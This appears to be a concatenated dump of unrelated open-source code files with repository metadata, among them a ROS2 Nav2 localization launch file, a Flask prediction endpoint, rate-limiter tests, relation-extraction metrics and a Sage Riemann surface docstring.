            cas_args['password'] = os.environ.get('CASPASSWORD', None)
            return CAS(**cas_args)
    warnings.warn('CAS connection cannot be established.', RuntimeWarning)
    return None
| 28.181818 | 74 | 0.645161 |
5975cd6fbf0a7ec1c7ad36d0a67bce3fe1ecdabc | 1,083 | py | Python | habitat_baselines/rl/hrl/skills/wait.py | Jiayuan-Gu/habitat-lab | 5ce36a6c6502fe8e86d6732ba8bab9a5db471574 | [
"MIT"
] | null | null | null | habitat_baselines/rl/hrl/skills/wait.py | Jiayuan-Gu/habitat-lab | 5ce36a6c6502fe8e86d6732ba8bab9a5db471574 | [
"MIT"
] | null | null | null | habitat_baselines/rl/hrl/skills/wait.py | Jiayuan-Gu/habitat-lab | 5ce36a6c6502fe8e86d6732ba8bab9a5db471574 | [
"MIT"
] | null | null | null | from typing import Any
import gym.spaces as spaces
import torch
from habitat_baselines.rl.hrl.skills.skill import SkillPolicy
class WaitSkillPolicy(SkillPolicy):
    """Skill that does nothing (emits zero actions) for a fixed number
    of steps.

    The wait duration comes from the skill argument, and the skill
    reports itself done once that many steps have elapsed.
    """

    def __init__(
        self,
        config,
        action_space: spaces.Space,
        batch_size,
    ):
        super().__init__(config, action_space, batch_size, True)
        # Steps to wait; -1 (invalid) until _parse_skill_arg sets it.
        self._wait_time = -1

    def _parse_skill_arg(self, skill_arg: str) -> Any:
        # NOTE(review): only the first element of skill_arg is used, so
        # this expects a sequence whose first item parses as an int
        # (despite the ``str`` annotation) -- confirm against callers.
        self._wait_time = int(skill_arg[0])
        self._internal_log(f"Requested wait time {self._wait_time}")

    def _is_skill_done(
        self,
        observations,
        rnn_hidden_states,
        prev_actions,
        masks,
    ) -> torch.BoolTensor:
        # The wait time must have been parsed before the skill steps.
        assert self._wait_time > 0
        return self._cur_skill_step >= self._wait_time

    def _internal_act(
        self,
        observations,
        rnn_hidden_states,
        prev_actions,
        masks,
        cur_batch_idx,
        deterministic=False,
    ):
        # Waiting is implemented as an all-zero action of the same shape
        # as the previous action tensor.
        action = torch.zeros(prev_actions.shape, device=prev_actions.device)
        return action, rnn_hidden_states
| 24.613636 | 76 | 0.638042 |
5022daad2d61e345ed4f186a89da55d635840af0 | 142 | py | Python | week6-python/hello/hello.py | fahofmeister/cs50x | 022eefa9f25958b115fc2d2a50d34aacbc2b62a5 | [
"MIT"
] | null | null | null | week6-python/hello/hello.py | fahofmeister/cs50x | 022eefa9f25958b115fc2d2a50d34aacbc2b62a5 | [
"MIT"
] | null | null | null | week6-python/hello/hello.py | fahofmeister/cs50x | 022eefa9f25958b115fc2d2a50d34aacbc2b62a5 | [
"MIT"
] | null | null | null | from cs50 import get_string
# Ask the user for their name and print a personalized greeting.
name = get_string("What's your name?\n")
print(f"hello, {name}")
3fbbd313309a56c8caaaf05f666e4fd2b5adf402 | 4,275 | py | Python | smacc2_sm_reference_library/sm_aws_warehouse_navigation/launch/localization_launch.py | reelrbtx/SMACC2 | ac61cb1599f215fd9f0927247596796fc53f82bf | [
"Apache-2.0"
] | 48 | 2021-05-28T01:33:20.000Z | 2022-03-24T03:16:03.000Z | smacc2_sm_reference_library/sm_aws_warehouse_navigation/launch/localization_launch.py | reelrbtx/SMACC2 | ac61cb1599f215fd9f0927247596796fc53f82bf | [
"Apache-2.0"
] | 75 | 2021-06-25T22:11:21.000Z | 2022-03-30T13:05:38.000Z | smacc2_sm_reference_library/sm_aws_warehouse_navigation/launch/localization_launch.py | reelrbtx/SMACC2 | ac61cb1599f215fd9f0927247596796fc53f82bf | [
"Apache-2.0"
] | 14 | 2021-06-16T12:10:57.000Z | 2022-03-01T18:23:27.000Z | # Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument, SetEnvironmentVariable
from launch.substitutions import LaunchConfiguration
from launch_ros.actions import Node
from nav2_common.launch import RewrittenYaml
def generate_launch_description():
    """Build the Nav2 localization bringup: map_server + AMCL plus the
    lifecycle manager that drives them, with namespace/map/use_sim_time/
    autostart/params_file exposed as launch arguments."""
    # Get the launch directory
    bringup_dir = get_package_share_directory("nav2_bringup")
    # Launch-time substitutions; resolved when the launch file is executed.
    namespace = LaunchConfiguration("namespace")
    map_yaml_file = LaunchConfiguration("map")
    use_sim_time = LaunchConfiguration("use_sim_time")
    autostart = LaunchConfiguration("autostart")
    params_file = LaunchConfiguration("params_file")
    # Nodes managed by the lifecycle manager below.
    lifecycle_nodes = ["map_server", "amcl"]
    # Map fully qualified names to relative ones so the node's namespace can be prepended.
    # In case of the transforms (tf), currently, there doesn't seem to be a better alternative
    # https://github.com/ros/geometry2/issues/32
    # https://github.com/ros/robot_state_publisher/pull/30
    # TODO(orduno) Substitute with `PushNodeRemapping`
    # https://github.com/ros2/launch_ros/issues/56
    remappings = [("/tf", "tf"), ("/tf_static", "tf_static")]
    # Create our own temporary YAML files that include substitutions
    param_substitutions = {"use_sim_time": use_sim_time, "yaml_filename": map_yaml_file}
    configured_params = RewrittenYaml(
        source_file=params_file,
        root_key=namespace,
        param_rewrites=param_substitutions,
        convert_types=True,
    )
    return LaunchDescription(
        [
            # Set env var to print messages to stdout immediately
            SetEnvironmentVariable("RCUTILS_LOGGING_BUFFERED_STREAM", "1"),
            DeclareLaunchArgument(
                "namespace", default_value="", description="Top-level namespace"
            ),
            DeclareLaunchArgument(
                "map",
                default_value=os.path.join(bringup_dir, "maps", "turtlebot3_world.yaml"),
                description="Full path to map yaml file to load",
            ),
            DeclareLaunchArgument(
                "use_sim_time",
                default_value="false",
                description="Use simulation (Gazebo) clock if true",
            ),
            DeclareLaunchArgument(
                "autostart",
                default_value="true",
                description="Automatically startup the nav2 stack",
            ),
            DeclareLaunchArgument(
                "params_file",
                default_value=os.path.join(bringup_dir, "params", "nav2_params.yaml"),
                description="Full path to the ROS2 parameters file to use",
            ),
            # Both nodes share the rewritten parameter file and tf remappings.
            Node(
                package="nav2_map_server",
                executable="map_server",
                name="map_server",
                output="screen",
                parameters=[configured_params],
                remappings=remappings,
            ),
            Node(
                package="nav2_amcl",
                executable="amcl",
                name="amcl",
                output="screen",
                parameters=[configured_params],
                remappings=remappings,
            ),
            # Drives the lifecycle transitions of map_server and amcl.
            Node(
                package="nav2_lifecycle_manager",
                executable="lifecycle_manager",
                name="lifecycle_manager_localization",
                output="screen",
                parameters=[
                    {"use_sim_time": use_sim_time},
                    {"autostart": autostart},
                    {"node_names": lifecycle_nodes},
                ],
            ),
        ]
    )
| 38.513514 | 94 | 0.621053 |
7c54f82c2c5891c4e2b9943c6e8c6350b8135c48 | 1,884 | py | Python | linkmap.py | iwanglian/tools | a0f6dec83421b33dcddb2064c0babdb292973feb | [
"MIT"
] | null | null | null | linkmap.py | iwanglian/tools | a0f6dec83421b33dcddb2064c0babdb292973feb | [
"MIT"
] | null | null | null | linkmap.py | iwanglian/tools | a0f6dec83421b33dcddb2064c0babdb292973feb | [
"MIT"
] | null | null | null | if __name__ == '__main__':
    import sys, os
    # NOTE: Python 2 script (dict.has_key, print statement).
    # Usage: linkmap.py <LinkMap file> [<source dir>]
    filenameArray = []
    # no_dir == 1: account for every object file; 0: only those whose source
    # (.m/.mm/.cpp) was found under the given directory.
    no_dir = 1
    if len(sys.argv) > 1:
        # walk around
        no_dir = 0
        rootDir = sys.argv[2]
        for root, dirs, files in os.walk(rootDir):
            for filespath in files:
                if filespath.endswith(".m") or filespath.endswith(".mm") or filespath.endswith(".cpp"):
                    # print(filespath)
                    file_parts = os.path.splitext(filespath)
                    filenameArray.append(file_parts[0])
    # parseState: 0 = skip, 1 = inside "# Object files:" section,
    # 2 = inside the address/size table.
    parseState = 0
    oDict = {}      # object-file number -> base filename
    sizeDict = {}   # base filename -> accumulated size in bytes
    for line in open(sys.argv[1]):
        if line.startswith(r"# Object files:"):
            parseState = 1
        elif line.startswith(r"# Address Size File Name"):
            parseState = 2
        elif line.startswith("#"):
            parseState = 0
        elif parseState == 1:
            # Lines look like "[ 42] /path/to/Foo.o"
            parts = line.split("] /")
            if len(parts) > 1:
                filename = os.path.basename(parts[1])
                file_parts = os.path.splitext(filename)
                if no_dir == 1:
                    oDict[parts[0]] = file_parts[0]
                else:
                    if file_parts[0] in filenameArray:
                        oDict[parts[0]] = file_parts[0]
        elif parseState == 2:
            parts = line.split("\t")
            if len(parts) < 3:
                continue
            fileno = parts[2].split("] ")[0]
            if oDict.has_key(fileno):
                filename = oDict[fileno]
                # Base 0: sizes are hex literals like 0x1A0.
                size = int(parts[1], 0)
                if sizeDict.has_key(filename):
                    sizeDict[filename] += size
                else:
                    sizeDict[filename] = size
    import operator
    # Report per-file linked size, largest first.
    sorted_sizeDict = sorted(sizeDict.items(), key=operator.itemgetter(1), reverse=True)
    for item in sorted_sizeDict:
        print item
| 33.642857 | 103 | 0.495754 |
aab4290fec3dda7af3c2b2e7f6a1fc3b083b1273 | 902 | py | Python | app/main/models/price.py | kenneth-kip/Kilimo-Smart-API | c0b281f4a5e61731f544e3ed27eeca9ee7615339 | [
"MIT"
] | null | null | null | app/main/models/price.py | kenneth-kip/Kilimo-Smart-API | c0b281f4a5e61731f544e3ed27eeca9ee7615339 | [
"MIT"
] | 2 | 2021-03-31T19:11:06.000Z | 2021-12-13T19:58:50.000Z | app/main/models/price.py | kenneth-kip/Kilimo-Smart-API | c0b281f4a5e61731f544e3ed27eeca9ee7615339 | [
"MIT"
] | null | null | null | """ Price Model """
from datetime import date
from .. import db
class Price(db.Model):
    """Market price record: low/high price and quantity of a produce item
    in a region on a given date."""
    __tablename__ = "Price"
    # Surrogate primary key.
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    # Lowest / highest observed price (numeric, two decimal places).
    low_price = db.Column(db.Numeric(scale=2), nullable=False)
    high_price = db.Column(db.Numeric(scale=2), nullable=False)
    quantity = db.Column(db.Integer, nullable=False, default=0)
    # Defaults to the day the row is created.
    date = db.Column(db.Date, nullable=False, default=date.today)
    # Region the price was recorded in.
    region_id = db.Column(db.Integer, db.ForeignKey('Region.id'), nullable=False)
    region = db.relationship('Region', backref=db.backref('Region', lazy=True))
    # Produce item the price refers to.
    produce_id = db.Column(db.Integer, db.ForeignKey('Produce.id'), nullable=False)
    produce = db.relationship('Produce', backref=db.backref('Produce', lazy=True))
    def __repr__(self):
        return f'<Price {self.produce.name}-{self.region.name}-{self.date} >'
| 39.217391 | 83 | 0.691796 |
ff1c5125869b2c3374e88bada1654a11dbbe0925 | 852 | py | Python | Chinese_remainder_theorem.py | kuzuri-03/Cryptography_Ciphers | e49bb346ea5651bf93530badb4e708a06c14eec7 | [
"MIT"
] | null | null | null | Chinese_remainder_theorem.py | kuzuri-03/Cryptography_Ciphers | e49bb346ea5651bf93530badb4e708a06c14eec7 | [
"MIT"
] | null | null | null | Chinese_remainder_theorem.py | kuzuri-03/Cryptography_Ciphers | e49bb346ea5651bf93530badb4e708a06c14eec7 | [
"MIT"
] | null | null | null | # modular inverse
def inverse_mod(a, b):
    """Return a Bezout coefficient s with a*s + b*t = gcd(a, b).

    When gcd(a, b) == 1 this makes s a modular inverse of a modulo b
    (possibly negative -- callers reduce it mod b afterwards).

    Implemented with the iterative extended Euclidean algorithm; the
    t-coefficients computed (and never used) by the original version
    have been dropped.
    """
    # (old_r, r) walk the remainder sequence; (old_s, s) track the
    # corresponding coefficients of `a`.
    old_r, r = a, b
    old_s, s = 1, 0
    while r != 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    return old_s
# The chinese remainder theorem
def chinese_remainder_theorem(mn, an):
    """Solve x = an[k] (mod mn[k]) for pairwise-coprime moduli mn.

    Returns the solution reduced below m = prod(mn).

    Bugfix: the original used true division ``m / mn[k]``, which yields a
    float under Python 3 and makes the whole computation approximate;
    integer floor division is used instead (identical under Python 2).
    """
    # m = product of all moduli.
    m = 1
    for modulus in mn:
        m *= modulus
    x = 0
    for k in range(len(mn)):
        Mk = m // mn[k]  # cofactor of the k-th modulus (exact integer)
        # yk = (Mk)^-1 mod mn[k], normalized to [0, mn[k]).
        yk = inverse_mod(Mk, mn[k]) % mn[k]
        x = x + an[k] * Mk * yk
    # Reduce below m (kept as a loop to preserve the original behavior for
    # negative residues, where `% m` would differ).
    while x >= m:
        x = x - m
    return x
# test
chinese_remainder_theorem([1,2],[4,3]) | 20.780488 | 45 | 0.444836 |
32c4526838735a013a37354edf4acb9b040cb0d5 | 1,735 | py | Python | guaCaster.py | IanDCarroll/guaCaster | fae81b2707492339091a3eb0e638ef396588c29e | [
"MIT"
] | 3 | 2017-12-03T20:14:25.000Z | 2019-01-22T05:05:02.000Z | guaCaster.py | IanDCarroll/guaCaster | fae81b2707492339091a3eb0e638ef396588c29e | [
"MIT"
] | null | null | null | guaCaster.py | IanDCarroll/guaCaster | fae81b2707492339091a3eb0e638ef396588c29e | [
"MIT"
] | null | null | null | import wtnDice
import guaNames
# NOTE: Python 2 code (print statements). Casts an I Ching hexagram with
# three-coin throws and names the old (jiu), changing (yi) and new (xin) gua.
def castYao():
    """Cast a single line (yao); returns the coin total (6..9 scheme, 3..6 here).

    NOTE(review): wtnDice.roll's argument semantics are not visible from this
    file -- presumably three two-sided dice; confirm against wtnDice.
    """
    #todo adjust tp call a wtnDice.di['totl'] getter method
    cast = wtnDice.roll(3,2,{},[])
    return cast
def idGua(guaCode):
    """Encode the six cast lines into three 6-digit gua codes (digits 6/9,
    one per line) and look up their names via guaNames.nameGua."""
    jiuGua = 0 #Old situation
    yiGua = 0 #The situation which affects the change
    xinGua = 0 #New situation
    for i in range(0,6): #Upper Trigram
        if guaCode[i] == 3: #Yang changes to Yin
            jiuGua += 9 * (10 ** i) #Yang
            yiGua += 9 * (10 ** i) #Active
            xinGua += 6 * (10 ** i) #Yin
        elif guaCode[i] == 4: #Yin stays yin
            jiuGua += 6 * (10 ** i) #Yin
            yiGua += 6 * (10 ** i) #Passive
            xinGua += 6 * (10 ** i) #Yin
        elif guaCode[i] == 5: #Yang stays Yang
            jiuGua += 9 * (10 ** i) #Yang
            yiGua += 6 * (10 ** i) #Passive
            xinGua += 9 * (10 ** i) #Yang
        else: #guaCode[i] ==6: #Yin changes to Yang
            jiuGua += 6 * (10 ** i) #Yin
            yiGua += 9 * (10 ** i) #Active
            xinGua += 9 * (10 ** i) #Yang
    a = guaNames.nameGua(jiuGua)
    b = guaNames.nameGua(yiGua)
    c = guaNames.nameGua(xinGua)
    return 'Jiu Gua: %s\nYi Gua: %s\nXin Gua: %s' % (a,b,c)
def castGua():
    """Cast six lines, print each line's ASCII picture, and return the
    named old/changing/new gua from idGua."""
    guaImag = []
    guaCode = []
    for i in range(0,6):
        guaCode.append(castYao())
    guaCode.reverse() #gua are built from the bottom up
    for j in range(0,6):
        if guaCode[j] == 3: #coins tossed are 1,1,1
            guaImag.append('_________ > Jiu > ___ ___')
        elif guaCode[j] == 4: #coins tossed are 1,2,1
            guaImag.append('___ ___ | Xin | ___ ___')
        elif guaCode[j] == 5: #coins tossed are 2,1,2
            guaImag.append('_________ | Xin | _________')
        else: #if guaCode[j] == 6: #coins tossed are 2,2,2
            guaImag.append('___ ___ > Jiu > _________')
        print guaImag[j]
    return idGua(guaCode)
def main():
    """Entry point: cast one hexagram and print the gua names."""
    print castGua()
if __name__=='__main__':
    main()
| 26.692308 | 57 | 0.588473 |
467c1da5b719d25c6e853475c1c02d8fe2e4583c | 1,465 | py | Python | tests/dao/redis/test_sliding_window_rate_limiter.py | 4heck/ru102py | 1961965f283b014b46e9618464ec1df6d9e6b03b | [
"MIT"
] | null | null | null | tests/dao/redis/test_sliding_window_rate_limiter.py | 4heck/ru102py | 1961965f283b014b46e9618464ec1df6d9e6b03b | [
"MIT"
] | null | null | null | tests/dao/redis/test_sliding_window_rate_limiter.py | 4heck/ru102py | 1961965f283b014b46e9618464ec1df6d9e6b03b | [
"MIT"
] | null | null | null | import time
import pytest
from redisolar.dao.base import RateLimitExceededException
from redisolar.dao.redis.sliding_window_rate_limiter import SlidingWindowRateLimiter
TEN_SECONDS = 10 * 1000
# Challenge #7
# @pytest.mark.skip("Remove for challenge #7")
def test_within_limit_inside_window(redis, key_schema):
    """Exactly 10 hits against a 10-per-window limiter: none may be rejected."""
    limiter = SlidingWindowRateLimiter(TEN_SECONDS, 10, redis, key_schema=key_schema)
    rejected = 0
    for _attempt in range(10):
        try:
            limiter.hit("foo")
        except RateLimitExceededException:
            rejected += 1
    assert rejected == 0
# @pytest.mark.skip("Remove for challenge #7")
def test_exceeds_limit_inside_window(redis, key_schema):
    """12 hits against a limit of 10: exactly two must be rejected."""
    limiter = SlidingWindowRateLimiter(TEN_SECONDS, 10, redis, key_schema=key_schema)
    rejected = 0
    for _attempt in range(12):
        try:
            limiter.hit("foo")
        except RateLimitExceededException:
            rejected += 1
    assert rejected == 2
# @pytest.mark.skip("Remove for challenge #7")
def test_exceeds_limit_outside_window(redis, key_schema):
    """Once the 100ms window has slid past, an 11th hit must be allowed."""
    limiter = SlidingWindowRateLimiter(100, 10, redis, key_schema=key_schema)
    for _attempt in range(10):
        limiter.hit("foo")
    # Wait long enough for every prior hit to fall out of the window.
    time.sleep(1)
    rejected = False
    try:
        limiter.hit("foo")
    except RateLimitExceededException:
        rejected = True
    assert rejected is False
| 26.160714 | 85 | 0.702389 |
784e56e7a3eb629a13274844419291d632014029 | 1,238 | py | Python | prediction/app.py | PauBatlle/NewsMultirank | 30f2f050bafdab1bf3902deac17c18ad5af648c0 | [
"Apache-2.0"
] | null | null | null | prediction/app.py | PauBatlle/NewsMultirank | 30f2f050bafdab1bf3902deac17c18ad5af648c0 | [
"Apache-2.0"
] | null | null | null | prediction/app.py | PauBatlle/NewsMultirank | 30f2f050bafdab1bf3902deac17c18ad5af648c0 | [
"Apache-2.0"
] | 1 | 2018-02-24T04:34:27.000Z | 2018-02-24T04:34:27.000Z | from flask import Flask, request, Response
from flask_cors import CORS
from predict import doPredict
import logging
from logging.handlers import RotatingFileHandler
from IPython import embed
app = Flask(__name__)
CORS(app)
@app.route('/', methods=['POST'])
def main():
aux = request.values
#embed()
print(len(request.values))
title = aux.to_dict(flat = False)['title'][0]
body = aux.to_dict(flat = False)['body'][0]
s = body.find(title)
if s == -1:
body = "*"
else:
body = body[s:]
#["Agrees", "Disagrees", "Discusses", "Unrelated"]
print("Title of the new: ", title)
#title = request.args['title']
#body = request.args.post('body')
result = doPredict(title, body)
print("Probabilities: ", result[0])
print("Most probable category: ", result[1])
print("Clickbaity title? : ", result[2])
resp = Response(result, status=200, mimetype='application/json')
return "resp"
#logger.info('This error output', file=sys.stderr)
#logger.info(title, file=sys.stdout)
#logger.info("Hi", file=sys.stdout)
#return print("Hello")
if __name__ == '__main__':
    # Bugfix: configure logging BEFORE starting the (blocking) dev server;
    # the original called basicConfig after app.run(), i.e. only at shutdown.
    logging.basicConfig(format='%(asctime)s %(module)s %(message)s', level=logging.INFO)
    logger = logging.getLogger(__name__)
    app.run(debug=True, host='0.0.0.0')
| 25.791667 | 85 | 0.692246 |
d88c79b5dc80e2ef528359116f99c915c4391a23 | 551 | py | Python | QucikSort_first.py | JhoLee/Algorithm | ae3db61ee8974e54ff4d6a15d0b6822353392339 | [
"Apache-2.0"
] | null | null | null | QucikSort_first.py | JhoLee/Algorithm | ae3db61ee8974e54ff4d6a15d0b6822353392339 | [
"Apache-2.0"
] | null | null | null | QucikSort_first.py | JhoLee/Algorithm | ae3db61ee8974e54ff4d6a15d0b6822353392339 | [
"Apache-2.0"
] | null | null | null | """
김용승 교수님의 알고리즘을 그대로 구현
"""
def QuickSort(R, m, n):
    """Sort R[m..n] in place in ascending order and return R.

    ``n`` is the inclusive index of the last element; the driver call
    ``QuickSort(R, 0, len(R))`` used in this file is also accepted
    (``n`` is clamped to ``len(R) - 1``).

    Bugfix: the original transcription raised IndexError on any call with
    ``m < n`` -- its partition scans were inverted (``R[i] >= R[m]`` /
    ``R[j] <= R[m]``) and the ``j`` scan started at ``n + 1`` with a guard
    ``j < len(R)`` that never let ``j`` move.
    """
    n = min(n, len(R) - 1)  # tolerate an exclusive upper bound at the top call
    if m < n:
        pivot = R[m]
        i = m + 1
        j = n
        while True:
            # Move i right past elements <= pivot, j left past elements > pivot.
            while i <= n and R[i] <= pivot:
                i = i + 1
            while j > m and R[j] > pivot:
                j = j - 1
            if i < j:
                R[i], R[j] = R[j], R[i]
            else:
                break
        # Place the pivot at its final position and recurse on both halves.
        R[m], R[j] = R[j], R[m]
        QuickSort(R, m, j - 1)
        QuickSort(R, j + 1, n)
    return R
R = [2, 4, 2, 1, 4]
print(R)
print(QuickSort(R, 0, len(R))) | 19 | 46 | 0.328494 |
18b0786e4c0aa62029941c668570d0479d971bee | 181 | py | Python | dispike/errors/warnings.py | mitsuaky/dispike | bd3ffb28fc03307077d647ee233f4f0e5c594434 | [
"MIT"
] | 41 | 2020-12-29T03:07:38.000Z | 2022-01-30T09:05:03.000Z | dispike/errors/warnings.py | mitsuaky/dispike | bd3ffb28fc03307077d647ee233f4f0e5c594434 | [
"MIT"
] | 66 | 2020-12-28T08:04:27.000Z | 2021-11-04T09:12:54.000Z | dispike/errors/warnings.py | mitsuaky/dispike | bd3ffb28fc03307077d647ee233f4f0e5c594434 | [
"MIT"
] | 11 | 2021-01-21T22:36:34.000Z | 2021-11-04T07:23:30.000Z | class InsecureBindingWithCustomHostWarning(UserWarning):
"""
    This warning is issued when a user binds to an IP address other than
    127.0.0.1.
"""
pass
| 22.625 | 81 | 0.690608 |
24143f5a3bbe148a5db33d504fb888c9c6f86d54 | 224 | py | Python | ashwintest/test_emuegde.py | akrishna1995/emuedge | d33845107be3c9bbfcaf030df0a989e9d4972743 | [
"MIT"
] | null | null | null | ashwintest/test_emuegde.py | akrishna1995/emuedge | d33845107be3c9bbfcaf030df0a989e9d4972743 | [
"MIT"
] | null | null | null | ashwintest/test_emuegde.py | akrishna1995/emuedge | d33845107be3c9bbfcaf030df0a989e9d4972743 | [
"MIT"
] | null | null | null | #! /usr/bin/python
import sys
import os
from .. import xen
# NOTE: Python 2 code (print statement).
def main():
    """Smoke test: build and start the two-way sample topology via xen."""
    print "Hello World"
    xnet=xen.test_topo(topo='exps/twoway_simple.topo', start=True, nolog=False)
if __name__ == "__main__" :
    # main() returns None, so sys.exit(None) reports success (exit code 0).
    sys.exit(main())
| 18.666667 | 78 | 0.683036 |
8c4c73d2194874a13185fa478372838e4d8eb696 | 4,415 | py | Python | tplinker/metrics.py | luozhouyang/TPLinker | 3cacf48901f73a4d4e90ed51d8d5bbf8aecb5a02 | [
"Apache-2.0"
] | 8 | 2021-05-03T02:06:05.000Z | 2022-03-25T09:35:32.000Z | tplinker/metrics.py | anatanick/TPLinker | 3cacf48901f73a4d4e90ed51d8d5bbf8aecb5a02 | [
"Apache-2.0"
] | 1 | 2021-05-01T08:03:45.000Z | 2021-05-14T09:39:45.000Z | tplinker/metrics.py | anatanick/TPLinker | 3cacf48901f73a4d4e90ed51d8d5bbf8aecb5a02 | [
"Apache-2.0"
] | 4 | 2021-04-14T19:45:29.000Z | 2022-03-28T01:58:35.000Z | import json
import pytorch_lightning as pl
import torch
from torchmetrics import Metric
from tplinker.tagging_scheme import HandshakingTaggingDecoder, TagMapping
class SampleAccuracy(Metric):
    """Fraction of samples whose tag matrix is predicted entirely correctly.

    A sample counts as correct only when *every* tag position (over all
    relations and all 1+2+...+seq_len handshaking positions) matches the
    target.
    """
    def __init__(self):
        super().__init__()
        # Distributed-safe counters: summed across processes on compute().
        self.add_state('correct', default=torch.tensor(0), dist_reduce_fx='sum')
        self.add_state('total', default=torch.tensor(0), dist_reduce_fx='sum')
    def update(self, preds, target):
        """Accumulate counts for one batch.

        ``preds`` carries per-position class scores (argmax over the last
        dim); ``target`` carries the integer tag ids.
        """
        # shape: (batch_size, num_relations, 1+2+...+seq_len)
        preds_id = torch.argmax(preds, dim=-1)
        # shape: (batch_size, num_relations * (1+2+...+seq_len))
        preds_id = preds_id.view(preds_id.size()[0], -1)
        # shape: (batch_size, num_relations * (1+2+...+seq_len))
        target = target.view(target.size()[0], -1)
        # num of correct tags
        correct_tags = torch.sum(torch.eq(target, preds_id), dim=1)
        # num of correct samples
        correct_samples = torch.sum(
            torch.eq(correct_tags, torch.ones_like(correct_tags) * target.size()[-1]))
        self.correct += correct_samples
        self.total += target.size()[0]
    def compute(self):
        """Return accumulated sample-level accuracy."""
        return self.correct / self.total
class _PRF(Metric):
    """Shared accumulator for the Precision/Recall/F1 metrics.

    Counts, over all (pred, gold) sample pairs seen so far:

    - ``correct``: relations present in both the predicted and gold sets,
    - ``prednum``: total number of predicted relations,
    - ``goldnum``: total number of gold relations.

    ``pattern`` selects how a relation dict is normalized into a string
    key before comparison (see ``_relation_key``).
    """

    def __init__(self, pattern='only_head_text', epsilon=1e-12):
        super().__init__()
        self.pattern = pattern
        # Smoothing constant used by subclasses to avoid division by zero.
        self.epsilon = epsilon
        self.add_state('correct', default=torch.tensor(0), dist_reduce_fx='sum')
        self.add_state('goldnum', default=torch.tensor(0), dist_reduce_fx='sum')
        self.add_state('prednum', default=torch.tensor(0), dist_reduce_fx='sum')

    @staticmethod
    def _relation_key(rel, pattern):
        """Normalize a relation dict into a comparison key for ``pattern``.

        The format strings are identical to the original per-pattern
        branches, which were four near-duplicate set comprehensions.
        """
        if pattern == 'whole_span':
            return '{}-{}-{}-{}-{}'.format(
                rel['subj_tok_span'][0], rel['subj_tok_span'][1], rel['predicate'],
                rel['obj_tok_span'][0], rel['obj_tok_span'][1])
        if pattern == 'whole_text':
            return '{}-{}-{}'.format(rel['subject'], rel['predicate'], rel['object'])
        if pattern == 'only_head_index':
            return '{}-{}-{}'.format(
                rel['subj_tok_span'][0], rel['predicate'], rel['obj_tok_span'][0])
        # Default pattern ('only_head_text'): compare only the first token
        # of the subject/object texts.
        return '{}-{}-{}'.format(
            rel['subject'].split(' ')[0], rel['predicate'], rel['object'].split(' ')[0])

    def update(self, pred_relations, gold_relations):
        """Accumulate counts for a batch of per-sample relation lists."""
        for pred, gold in zip(pred_relations, gold_relations):
            pred_set, gold_set = self._parse_relations_set(pred, gold)
            # Predicted relations that also appear in the gold set.
            self.correct += len(pred_set & gold_set)
            self.prednum += len(pred_set)
            self.goldnum += len(gold_set)

    def _parse_relations_set(self, pred_relations, gold_relations):
        """Return ``(pred_set, gold_set)`` of normalized relation keys."""
        pred_set = set(self._relation_key(rel, self.pattern) for rel in pred_relations)
        gold_set = set(self._relation_key(rel, self.pattern) for rel in gold_relations)
        return pred_set, gold_set
class Precision(_PRF):
    """Precision = correct / predicted, epsilon-smoothed."""

    def compute(self):
        denominator = self.prednum + self.epsilon
        return self.correct / denominator
class Recall(_PRF):
    """Recall = correct / gold, epsilon-smoothed."""

    def compute(self):
        denominator = self.goldnum + self.epsilon
        return self.correct / denominator
class F1(_PRF):
def compute(self):
precision = self.correct / (self.prednum + self.epsilon)
recall = self.correct / (self.goldnum + self.epsilon)
f1 = 2.0 * precision * recall / (precision + recall + self.epsilon)
return f1
| 39.419643 | 132 | 0.588675 |
d0975e773b7a5bf7c61638051e6ee01a3d3b8f2b | 89,520 | py | Python | src/sage/schemes/riemann_surfaces/riemann_surface.py | ChamanAgrawal/sage | 5f6d56ba247b352d7d46442e88fa3a027e9f222d | [
"BSL-1.0"
] | 2 | 2019-06-02T03:16:59.000Z | 2019-06-15T10:17:18.000Z | src/sage/schemes/riemann_surfaces/riemann_surface.py | ChamanAgrawal/sage | 5f6d56ba247b352d7d46442e88fa3a027e9f222d | [
"BSL-1.0"
] | null | null | null | src/sage/schemes/riemann_surfaces/riemann_surface.py | ChamanAgrawal/sage | 5f6d56ba247b352d7d46442e88fa3a027e9f222d | [
"BSL-1.0"
] | 1 | 2019-06-02T03:16:55.000Z | 2019-06-02T03:16:55.000Z | r"""
Riemann matrices and endomorphism rings of algebraic Riemann surfaces
This module provides a class, RiemannSurface, to model the Riemann surface
determined by a plane algebraic curve over a subfield of the complex numbers.
A homology basis is derived from the edges of a Voronoi cell decomposition based
on the branch locus. The pull-back of these edges to the Riemann surface
provides a graph on it that contains a homology basis.
The class provides methods for computing the Riemann period matrix of the
surface numerically, using a certified homotopy continuation method due to
[Kr2016].
The class also provides facilities for computing the endomorphism ring of the
period lattice numerically, by determining integer (near) solutions to the
relevant approximate linear equations.
AUTHORS:
- Alexandre Zotine, Nils Bruin (2017-06-10): initial version
- Nils Bruin, Jeroen Sijsling (2018-01-05): algebraization, isomorphisms
EXAMPLES:
We compute the Riemann matrix of a genus 3 curve::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<x,y>=QQ[]
sage: f=x^4-x^3*y+2*x^3+2*x^2*y+2*x^2-2*x*y^2+4*x*y-y^3+3*y^2+2*y+1
sage: S=RiemannSurface(f,prec=100)
sage: M=S.riemann_matrix()
We test the usual properties, i.e., that the period matrix is symmetric and that
the imaginary part is positive definite::
sage: all(abs(a) < 1e-20 for a in (M-M.T).list())
True
sage: iM = Matrix(RDF,3,3,[a.imag_part() for a in M.list()])
sage: iM.is_positive_definite()
True
We compute the endomorphism ring and check it has `\ZZ`-rank 6::
sage: A=S.endomorphism_basis(80,8)
sage: len(A) == 6
True
In fact it is an order in a number field::
sage: T.<t>=QQ[]
